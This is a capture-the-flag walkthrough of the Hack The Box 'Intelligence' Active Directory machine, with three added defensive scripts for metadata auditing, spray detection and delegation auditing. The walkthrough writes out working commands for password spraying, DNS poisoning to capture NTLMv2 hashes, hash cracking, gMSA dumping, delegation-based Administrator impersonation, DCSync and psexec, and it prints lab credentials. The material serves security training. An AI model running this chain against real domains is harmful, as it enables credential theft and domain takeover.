Pentest Everything
Last updated 2 years ago

Intelligence

https://app.hackthebox.com/machines/Intelligence

Attachments (at the end of the page): Autorecon output archive (password: PentestEverything), BloodHound collection archive, Nmap scan.

Add "10.10.10.248 intelligence.htb" to /etc/hosts.

Starting out on port 80, we come to the root page for Intelligence.

Running feroxbuster against the host reveals few results.

We see that further down the main page we have an opportunity to download a PDF document. At a glance there is nothing special about the document.

However, pulling metadata from the PDF document reveals potentially interesting user information.

We can achieve this with exiftool.

We can then put the username into a known-users text file and check whether the name is valid with kerbrute.

Great, we have a valid username. However, I was unable to brute force this user account. We also know the account does not have pre-authentication enabled...

Looking back at the original request for the PDF document, we notice that we are unable to list the contents of, or browse to, the /documents directory on port 80.

The URL request for the document download has potentially fuzzable areas in the file name. We can try fuzzing for other PDF documents in the date range of the file name.

Firstly, I started OWASP ZAP and requested the PDF document again. From here I selected the request and sent it to the fuzzer.

To ensure complete coverage I selected each individual numeral from the date and added individual payloads for numbers 0-9 using the Numberzz module.

Then I executed the fuzzer; in total we sent 10,000 requests to the target. Once it completed, sorting the results by size shows which requests have PDF documents available.

Highlighting all the requests with a response body larger than 1,245 bytes should capture everything of interest.

Once we have highlighted all the requests of interest, we can right-click to open the context menu, choose "Copy URLs to clipboard" and paste the results into a text file.

With a list of URLs we can run xargs with curl to download from each URL.

We can then run exiftool against all the PDFs and extract the creator names into a known-users file.
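The same harvesting can be done without exiftool, and a site owner can run it against their own document store before anything is published. The following Python script is an added example, not part of the original writeup: a small parser for the Creator, Author and Producer entries of a PDF Info dictionary that handles literal strings with backslash escapes and UTF-16BE hex strings, walks a directory tree and returns the de-duplicated names, which is what the exiftool | grep Creator pipeline above produces. The sample PDFs are constructed in memory, and make_sample_pdf and demo are helper names chosen here.

```python
"""Audit a directory of PDFs for metadata that leaks usernames.

Added example, not part of the original writeup: a dependency-free parser
for the Creator/Author/Producer entries of a PDF Info dictionary. It does
for a whole directory tree what exiftool -r | grep Creator does above.
All PDFs used here are constructed in memory.
"""
import re
import tempfile
from pathlib import Path

# Only these two Info keys normally carry a person's name; Producer is the generating software.
NAME_KEYS = ("Creator", "Author")

# Matches /Key (literal string) or /Key <hex string> anywhere in the file body.
_ENTRY_RE = re.compile(
    rb"/(Creator|Author|Producer)\s*"
    rb"(?:\((?P<lit>(?:\\.|[^\\)])*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)"
)


def _unescape_literal(lit: bytes) -> bytes:
    """Resolve the common backslash escapes inside a ( ... ) string."""
    out = bytearray()
    i = 0
    while i < len(lit):
        if lit[i] == 0x5C and i + 1 < len(lit):  # backslash
            nxt = lit[i + 1]
            # \n \r \t become control characters; \( \) \\ become the character itself
            out.append({0x6E: 0x0A, 0x72: 0x0D, 0x74: 0x09}.get(nxt, nxt))
            i += 2
        else:
            out.append(lit[i])
            i += 1
    return bytes(out)


def _decode_pdf_string(raw: bytes) -> str:
    """UTF-16BE when the string carries a BOM, otherwise PDFDocEncoding (close to Latin-1)."""
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", errors="replace")
    return raw.decode("latin-1")


def extract_metadata(pdf_bytes: bytes) -> dict:
    """Return {key: value} for the Creator/Author/Producer entries found in a PDF."""
    found = {}
    for m in _ENTRY_RE.finditer(pdf_bytes):
        key = m.group(1).decode("ascii")
        if m.group("lit") is not None:
            raw = _unescape_literal(m.group("lit"))
        else:
            hexdigits = re.sub(rb"\s", b"", m.group("hex"))
            if len(hexdigits) % 2:  # PDF pads an odd final hex digit with 0
                hexdigits += b"0"
            raw = bytes.fromhex(hexdigits.decode("ascii"))
        found.setdefault(key, _decode_pdf_string(raw).strip())  # keep the first occurrence
    return found


def harvest_names(directory: Path) -> list:
    """Walk a directory tree and return the sorted, de-duplicated names found in Creator/Author."""
    names = set()
    for pdf in directory.rglob("*.pdf"):
        meta = extract_metadata(pdf.read_bytes())
        names.update(meta[k] for k in NAME_KEYS if meta.get(k))
    return sorted(names)


def make_sample_pdf(creator: bytes) -> bytes:
    """Minimal PDF-like file with an Info dictionary. Constructed test data, not a valid document."""
    return (b"%PDF-1.4\n1 0 obj\n<< /Creator " + creator +
            b" /Producer (Microsoft Office Word) >>\nendobj\ntrailer\n<< /Info 1 0 R >>\n%%EOF\n")


def demo() -> list:
    """Write a few constructed PDFs to a temporary tree and harvest names from it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sub").mkdir()
        (root / "2020-01-01-upload.pdf").write_bytes(make_sample_pdf(b"(William.Lee)"))
        (root / "sub" / "2020-06-04-upload.pdf").write_bytes(make_sample_pdf(b"(Tiffany.Molina)"))
        # Some generators emit UTF-16BE hex strings with a BOM.
        hex_name = (b"\xfe\xff" + "Ted.Graves".encode("utf-16-be")).hex().encode("ascii")
        (root / "sub" / "2020-07-02-upload.pdf").write_bytes(make_sample_pdf(b"<" + hex_name + b">"))
        # Escaped parentheses inside a literal string.
        (root / "notes.pdf").write_bytes(make_sample_pdf(b"(Jane \\(IT\\))"))
        return harvest_names(root)


if __name__ == "__main__":
    print("\n".join(demo()))
```

Run it against a real export directory by calling harvest_names(Path("/path/to/docs")). Anything it returns is a username or display name that the web server is handing out to anonymous visitors.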

Checking the list with kerbrute for accounts without pre-authentication, we do not get any positive hits. We do at least confirm that the users exist.

From here I tried brute forcing the username list for quite some time, utilizing various common password lists and could not get a single hit over any of the available protocols.

Digging deeper into our results I looked into parsing all the PDF documents for interesting information.

I researched the best way to parse PDF documents recursively for information and came across pdfgrep.

Install

Using the following command and specified pattern we identify something of interest.

Opening the file 2020-06-04-upload.pdf shows us a potential password.

Password

We can spray this password with crackmapexec against SMB with our user list.

This gives us the following valid credentials:
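A spray like the one above is loud on the domain controller: one source address produces a failed logon (event 4625) for every name in users.txt within a few seconds, followed by a successful logon (4624) for the one account that accepted the password. The following Python script is an added example, not part of the writeup: it reads constructed logon events, groups them per source address in a sliding time window and flags sources that failed against many distinct accounts, separating accounts that exist (sub-status 0xC000006A, wrong password) from names that do not (0xC0000064) and reporting any account that then succeeded. The event line format, addresses and thresholds are constructed for the example.

```python
"""Flag password spraying in a feed of Windows logon events (4625/4624).

Added example, not from the writeup. A one-password-many-users spray shows
up as a burst of 4625 failures from one source against many distinct
accounts, often followed by a 4624 success for the account that accepted
the password. The events below are constructed; real ones would come from
a SIEM or an EVTX export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

BAD_PASSWORD = "0xC000006A"  # account exists, wrong password
NO_SUCH_USER = "0xC0000064"  # account name does not exist


def parse_event(line: str) -> dict:
    """Parse one constructed 'key=value|key=value' event line into a dict."""
    rec = {}
    for token in line.split("|"):
        key, _, value = token.partition("=")
        rec[key.strip()] = value.strip()
    rec["time"] = datetime.fromisoformat(rec["time"])
    return rec


def detect_spray(lines, window=timedelta(minutes=10), min_accounts=10) -> dict:
    """Return {source_ip: finding} for sources that failed logons against many accounts in one window."""
    per_src = defaultdict(list)
    for rec in map(parse_event, lines):
        if rec["event"] in ("4625", "4624"):
            per_src[rec["src"]].append(rec)
    findings = {}
    for src, recs in per_src.items():
        recs.sort(key=lambda r: r["time"])
        for i, first in enumerate(recs):
            hits = [r for r in recs[i:] if r["time"] - first["time"] <= window]
            failures = [r for r in hits if r["event"] == "4625"]
            tried = {r["user"] for r in failures}
            if len(tried) < min_accounts:
                continue
            findings[src] = {
                "window_start": first["time"].isoformat(),
                "accounts_tried": len(tried),
                # Existing accounts got "wrong password"; unknown names got "no such user".
                "existing": len({r["user"] for r in failures if r["substatus"] == BAD_PASSWORD}),
                "unknown": len({r["user"] for r in failures if r["substatus"] == NO_SUCH_USER}),
                "succeeded": sorted({r["user"] for r in hits if r["event"] == "4624"}),
            }
            break  # one finding per source is enough
    return findings


def build_sample_events() -> list:
    """Constructed events: a spray from one address plus a user mistyping their own password."""
    users = ["Anita.Roberts", "Brian.Baker", "Brian.Morris", "Daniel.Shelton", "Danny.Matthews",
             "Darryl.Harris", "David.Mcbride", "David.Reed", "David.Wilson", "Ian.Duncan",
             "Jason.Patterson", "Tiffany.Molina", "Jane.Doe", "John.Smith"]
    t0 = datetime(2022, 3, 16, 4, 0, 0)
    lines = []
    for i, user in enumerate(users):
        t = (t0 + timedelta(seconds=i)).isoformat()
        if user == "Tiffany.Molina":  # the one account where the sprayed password was right
            lines.append(f"time={t}|event=4624|src=10.10.14.14|user={user}|substatus=0x0|logontype=3")
        else:
            sub = NO_SUCH_USER if user in ("Jane.Doe", "John.Smith") else BAD_PASSWORD
            lines.append(f"time={t}|event=4625|src=10.10.14.14|user={user}|substatus={sub}|logontype=3")
    for i in range(2):  # two failures for one account from a workstation: not a spray
        t = (t0 + timedelta(minutes=3, seconds=i)).isoformat()
        lines.append(f"time={t}|event=4625|src=10.10.10.50|user=Ted.Graves|substatus={BAD_PASSWORD}|logontype=2")
    return lines


if __name__ == "__main__":
    for src, finding in detect_spray(build_sample_events()).items():
        print(src, finding)
```

The "existing" versus "unknown" split matters for triage: a high count of existing accounts means the attacker already had a good user list (here, one harvested from PDF metadata), and "succeeded" tells you which account to reset first.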

I was unable to use these credentials to gain a shell on the target system. We can, however, use BloodHound.py for external information gathering.

Looking at the BloodHound results, we have found a path for privilege escalation. First we need to get access to either Ted's or Laura's AD account.

Back with our tiffany user we look at SMB, and see that we have read access to the IT share.

Inside the IT share we find a PowerShell script, which can be downloaded. Its contents are shown below:

Looking at the script, a list of DNS records is fetched from LDAP and any record with a name like "web*" is then used in an Invoke-WebRequest to test whether the host is alive. The -UseDefaultCredentials parameter makes that web request with the credentials of the user running the script; going by the Send-MailMessage parameters, that is hopefully Ted.

We can probably use Responder to capture an NTLMv2 hash here. First we need a way to make a new DNS record point back to us.

dnstool.py can be used to add a new DNS record to the target domain. The command below adds a DNS record whose name starts with "web", which triggers the PowerShell script that runs every 5 minutes.

GitHub: https://github.com/dirkjanm/krbrelayx.git

We can confirm the DNS record has been added by using ldapsearch with tiffany's credentials.

Then we can start Responder (with the default responder.conf). After around five minutes the PowerShell script fires, connects back to our attacking machine and we capture an NTLMv2 hash.

NTLMv2 hash

We can then crack the password with hashcat against the rockyou.txt password list.

We now have the following credentials:

Now that we have access to Ted's account we can refer back to the Bloodhound attack path identified earlier on.

gMSA, or Group Managed Service Accounts, offer a more automated and secure way to manage service accounts. Stealthbits have a great blog post on what they are and how they are implemented, linked below.

gMSADumper is a Python script that can be used to read the msDS-ManagedPassword attribute and decrypt it with the msDS-ManagedPasswordID attribute.

Credentials

From the BloodHound results earlier we see that svc_int has delegation rights to the domain controller.

Now, with the svc_int account hash, we can use Impacket's getST.py to retrieve a service ticket for the service we have delegation rights to ("www") while impersonating another user ("administrator").

When impersonating in this way we also get access to any services that are accessible to the impersonated account. Impersonating the administrator account gives us the ability to access services such as LDAP (DCSync attack) or HOST (psexec.py).
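Two of the steps above depend on account flags a defender can audit directly: the kerbrute check earlier looks for accounts with the DONT_REQ_PREAUTH bit of userAccountControl set, and the getST.py impersonation works because svc_int has constrained delegation to a domain controller SPN with protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION) while the Administrator account is not marked "sensitive and cannot be delegated" (NOT_DELEGATED). The following Python script is an added example and not part of the original writeup: it decodes those bits over a set of constructed account records (the flag values are the real ones; accounts other than those named on this page are made up) and lists what a defender would want to fix.

```python
"""Audit Active Directory account flags that matter in this attack chain.

Added example, not part of the original writeup. It decodes the
userAccountControl bits behind the kerbrute pre-authentication check and
the svc_int -> WWW/dc.intelligence.htb delegation path, and reports
privileged accounts that are not protected from delegation. The records
are constructed stand-ins for an LDAP result; only the flag values are real.
"""
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "NOT_DELEGATED": 0x100000,                    # "account is sensitive and cannot be delegated"
    "DONT_REQ_PREAUTH": 0x400000,                 # no Kerberos pre-authentication (AS-REP roastable)
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation with protocol transition
}

# Constructed records; real ones come from an LDAP search returning
# sAMAccountName, userAccountControl and msDS-AllowedToDelegateTo.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "William.Lee", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_int", "userAccountControl": 0x1010200,
     "msDS-AllowedToDelegateTo": ["WWW/dc.intelligence.htb"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1010200,
     "msDS-AllowedToDelegateTo": ["CIFS/fileserver.intelligence.htb"]},  # not a DC, lower risk
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x410200},      # pre-auth disabled
    {"sAMAccountName": "webproxy", "userAccountControl": 0x80200},         # unconstrained
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202},         # disabled, so ignored
]


def decode_uac(value: int) -> set:
    """Names of the UAC_FLAGS bits set in a userAccountControl value."""
    return {name for name, bit in UAC_FLAGS.items() if value & bit}


def spn_host(spn: str) -> str:
    """'WWW/dc.intelligence.htb:80' -> 'dc.intelligence.htb'."""
    _service, _, rest = spn.partition("/")
    return rest.split(":")[0].lower()


def audit_accounts(accounts, domain_controllers, privileged=frozenset()) -> list:
    """Return sorted (account, issue) pairs for enabled accounts."""
    dcs = {h.lower() for h in domain_controllers}
    findings = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        flags = decode_uac(acct["userAccountControl"])
        if "ACCOUNTDISABLE" in flags:
            continue
        if "DONT_REQ_PREAUTH" in flags:
            findings.append((name, "no Kerberos pre-authentication (AS-REP roastable)"))
        if "TRUSTED_FOR_DELEGATION" in flags:
            findings.append((name, "unconstrained delegation"))
        # Constrained delegation is only dangerous here when the target SPN belongs to a DC.
        dc_targets = [t for t in acct.get("msDS-AllowedToDelegateTo", []) if spn_host(t) in dcs]
        if dc_targets:
            mode = ("with protocol transition" if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags
                    else "Kerberos-only")
            findings.append((name, f"constrained delegation to a DC ({', '.join(dc_targets)}), {mode}"))
        # The impersonation step fails against accounts carrying NOT_DELEGATED.
        if name in privileged and "NOT_DELEGATED" not in flags:
            findings.append((name, "privileged account not marked 'sensitive and cannot be delegated'"))
    return sorted(findings)


if __name__ == "__main__":
    for account, issue in audit_accounts(SAMPLE_ACCOUNTS, ["dc.intelligence.htb"], {"Administrator"}):
        print(f"{account}: {issue}")
```

Feeding it real data is a matter of replacing SAMPLE_ACCOUNTS with the result of an LDAP query for those three attributes; the domain controller list can come from the same directory.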

Then run the following command to point Impacket at the Kerberos ticket.

secretsdump.py can then be used to perform a DCSync attack and dump hashes.

psexec.py can also be used for direct system access as the administrator account.


Commands and output

Machine: https://app.hackthebox.com/machines/Intelligence

Feroxbuster against the web root:

```bash
feroxbuster -u http://10.10.10.248 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
```

Metadata of the first document:

```bash
exiftool 2020-01-01-upload.pdf
```

Validate the username with kerbrute:

```bash
kerbrute userenum users.txt -d intelligence.htb --dc 10.10.10.248
```

Document URL used as the fuzzing template:

```
http://10.10.10.248/documents/2020-01-01-upload.pdf
```

Download every URL exported from ZAP:

```bash
xargs -n 1 curl -O < "URLs.txt"
```

Collect the Creator names from all PDFs:

```bash
exiftool -r *.pdf | grep Creator | sed 's/Creator                         : //' | sort | uniq > KnownUsers.txt
```

KnownUsers.txt:

```
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
```

Install pdfgrep and search all documents recursively:

```bash
sudo apt install pdfgrep
pdfgrep -r pass .
```

Password found in 2020-06-04-upload.pdf:

```
NewIntelligenceCorpUser9876
```

Spray the password with crackmapexec:

```bash
crackmapexec smb '10.10.10.248' -u 'users.txt' -p 'NewIntelligenceCorpUser9876'
```

Valid credentials:

```
Tiffany.Molina:NewIntelligenceCorpUser9876
```

BloodHound collection and SMB share enumeration:

```bash
sudo python2 bloodhound.py -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -c All -d intelligence.htb -gc dc.intelligence.htb -ns 10.10.10.248 --dns-timeout 20 --zip
smbmap -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -H 10.10.10.248
```

PowerShell script found in the IT share:

```powershell
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
```

Add a DNS record pointing back to the attacking machine (dnstool.py from krbrelayx):

```bash
sudo python3 dnstool.py -u intelligence.htb\\tiffany.molina -p 'NewIntelligenceCorpUser9876' -r Webfake.intelligence.htb -a add -d 10.10.14.14 10.10.10.248
```

Confirm the record with ldapsearch:

```bash
ldapsearch -x -h 10.10.10.248 -D 'CN=Tiffany Molina,CN=Users,DC=intelligence,DC=htb' -w 'NewIntelligenceCorpUser9876' -b "DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | grep Web
```

Start Responder:

```bash
sudo python2 Responder.py -I tun0 -A
```

NTLMv2 hash (truncated on this page):

```
Ted.Graves::intelligence:442c947175c3a3b...
```

Crack it with hashcat (mode 5600, NetNTLMv2):

```bash
hashcat -m 5600 hash.hash /usr/share/wordlists/rockyou.txt
```

Credentials:

```
Ted.Graves:Mr.Teddy
```

Read the gMSA password with gMSADumper:

```bash
python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l 10.10.10.248
```

Credentials:

```
svc_int:a5fd76c71109b0b483abe309fbc92ccb
```

Request a service ticket impersonating Administrator, point Impacket at it, then DCSync or PsExec:

```bash
getST.py intelligence.htb/svc_int -hashes :a5fd76c71109b0b483abe309fbc92ccb -spn WWW/dc.intelligence.htb -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass dc.intelligence.htb
psexec.py -k -no-pass dc.intelligence.htb
```
Links:

BloodHound.py: https://github.com/fox-it/BloodHound.py
Stealthbits on gMSA: https://stealthbits.com/blog/what-are-group-managed-service-accounts-gmsa/
Stealthbits on securing gMSA passwords: https://stealthbits.com/blog/securing-gmsa-passwords/
gMSADumper: https://github.com/micahvandeusen/gMSADumper

Nmap:

```
nmap 10.10.10.248 -p- -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-16 03:37:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
59877/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Attachments:

Autorecon - 10.10.10.248.7z (archive, 206KB)
Bloodhound - 10.10.10.248.zip (archive, 215KB)

Web root: http://10.10.10.248/